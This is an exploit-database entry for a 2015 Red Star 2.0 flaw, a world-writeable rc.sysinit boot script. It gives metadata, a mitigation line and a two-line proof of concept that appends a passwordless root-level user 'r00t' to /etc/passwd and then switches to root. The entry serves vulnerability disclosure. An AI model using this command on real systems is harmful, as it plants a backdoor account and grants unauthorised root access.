header-logo
Suggest Exploit
vendor:
Red Star 2.0
by:
HackerFantastic
7.2
CVSS
HIGH
Privilege Escalation
264
CWE
Product Name: Red Star 2.0
Affected Version From: Red Star 2.0
Affected Version To: Red Star 2.0
Patch Exists: NO
Related CWE: N/A
CPE: o:redstar:red_star_2.0
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Linux
2015

Red Star 2.0 desktop world-writeable /etc/rc.d/rc.sysinit vulnerability

Red Star 2.0 desktop ships with a world-writeable /etc/rc.d/rc.sysinit which can be abused to execute commands on boot. An example exploitation of this vulnerability is shown in the link provided, which adds a new user 'r00t' to the /etc/passwd file and then switches to the root user.

Mitigation:

Ensure that the /etc/rc.d/rc.sysinit file is not world-writeable.
Source

Exploit-DB raw data:

Red Star 2.0 desktop ships with a world-writeable "/etc/rc.d/rc.sysinit"
which can be abused to execute commands on
boot. An example exploitation of this vulnerability is shown here
https://github.com/HackerFantastic/Public/blob/master/exploits/redstar2.0-localroot.png

PoC:

/bin/echo "r00t::0:0::/tmp:/bin/bash" >> /etc/passwd
su - root


## Source: http://www.openwall.com/lists/oss-security/2015/01/09/6

Navigation

Suggest Exploit

Services By CQR